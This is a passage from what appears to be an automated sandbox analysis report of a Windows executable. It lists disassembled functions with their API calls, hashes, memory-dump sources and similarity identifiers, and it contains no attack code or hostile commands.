                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00452AC7 Relevance: 31.8, APIs: 21, Instructions: 343COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                                                                                                                                                                                                                                                                                                                                                                                                                                • _fseek.LIBCMT ref: 00452B3B
                                                                                                                                                                                                                                                                                                                                                                                                                                • __wsplitpath.LIBCMT ref: 00452B9B
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscpy.LIBCMT ref: 00452BB0
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 00452BC5
                                                                                                                                                                                                                                                                                                                                                                                                                                • __wsplitpath.LIBCMT ref: 00452BEF
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 00452C07
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 00452C1C
                                                                                                                                                                                                                                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 00452C53
                                                                                                                                                                                                                                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 00452C64
                                                                                                                                                                                                                                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 00452C83
                                                                                                                                                                                                                                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 00452C94
                                                                                                                                                                                                                                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 00452CB5
                                                                                                                                                                                                                                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 00452CC6
                                                                                                                                                                                                                                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 00452CD7
                                                                                                                                                                                                                                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 00452CE8
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                                                                                                                                                                                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 00452D78
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2054058615-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0044870C Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 311COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2353593579-4108050209
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0044A032 Relevance: 31.7, APIs: 21, Instructions: 198windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 0044A05E
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0044A0D1
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowDC.USER32(?), ref: 0044A0F6
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                                                                                                                                                                                                                                                                                                                                                                                                                • ReleaseDC.USER32(?,?), ref: 0044A11B
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 0044A131
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 0044A14F
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetSysColor.USER32(00000005), ref: 0044A15B
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowDC.USER32(?), ref: 0044A1BE
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                                                                                                                                                                                                                                                                                                                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetSysColor.USER32(00000008), ref: 0044A265
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetStockObject.GDI32(00000005), ref: 0044A28A
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1744303182-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00417C20 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                                                                                                                                                                                                                                                                                                                                                                                                                • __mtterm.LIBCMT ref: 00417C34
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                                                                                                                                                                                                                                                                                                                                                                                                                • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                                                                                                                                                                                                                                                                                                                                                                                                                • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                                                                                                                                                                                                                                                                                                                                                                                                                • __init_pointers.LIBCMT ref: 00417CE6
                                                                                                                                                                                                                                                                                                                                                                                                                                • __calloc_crt.LIBCMT ref: 00417D54
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4163708885-3819984048
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0046ED8E Relevance: 26.7, APIs: 6, Strings: 9, Instructions: 471COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32(?,?,?,?,?,?,?), ref: 0046EE79
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32(?,?,?,?,?,?), ref: 0046F265
                                                                                                                                                                                                                                                                                                                                                                                                                                • IsWindow.USER32(?), ref: 0046F29A
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 0046F356
                                                                                                                                                                                                                                                                                                                                                                                                                                • EnumChildWindows.USER32(00000000), ref: 0046F35D
                                                                                                                                                                                                                                                                                                                                                                                                                                • EnumWindows.USER32(0046130D,?), ref: 0046F365
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window$EnumForegroundWindows_wcslen$ChildDesktop_memmove
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 329138477-1919597938
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 7eb0f3ae9a0304a5d069b7ca5d1222961736e80184ced8954434bc01324a9774
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 15289122aec5319afe5b60ce0d71565fabc5791e0031d8771947120ab82528ab
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7eb0f3ae9a0304a5d069b7ca5d1222961736e80184ced8954434bc01324a9774
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 83F10B714143019BDB00FF61D885AAFB3A4BF85308F44496FF94567282E779E909CBA7
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0045DF23 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 190timeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetLocalTime.KERNEL32(?), ref: 0045DFE5
                                                                                                                                                                                                                                                                                                                                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 0045DFF5
                                                                                                                                                                                                                                                                                                                                                                                                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0045E001
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcsncpy.LIBCMT ref: 0045E020
                                                                                                                                                                                                                                                                                                                                                                                                                                • __wsplitpath.LIBCMT ref: 0045E065
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 0045E07D
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 0045E08F
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0045E0A4
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0045E0B8
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0045E0F6
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0045E10C
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0045E11E
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscpy.LIBCMT ref: 0045E12A
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0045E170
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CurrentDirectory$Time$File$Local_wcscat$System__wsplitpath_wcscpy_wcsncpy
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: *.*
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3201719729-438819550
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b07f584b71cf8d19aa50005951bdae2eb0100712e91d12c0769b4b69628a66d9
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 7dcc6d5f32d0a9fc1f1ff7e746cf1f91f269f34358fad58ace0a68446733b78c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b07f584b71cf8d19aa50005951bdae2eb0100712e91d12c0769b4b69628a66d9
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 296199725043009BD724EF61D981E9FB3E9AFC4315F004D1EF98A87241DB79E949CBA6
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004341E6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 91windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __wcsicoll$IconLoad
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: blank$info$question$stop$warning
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2485277191-404129466
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
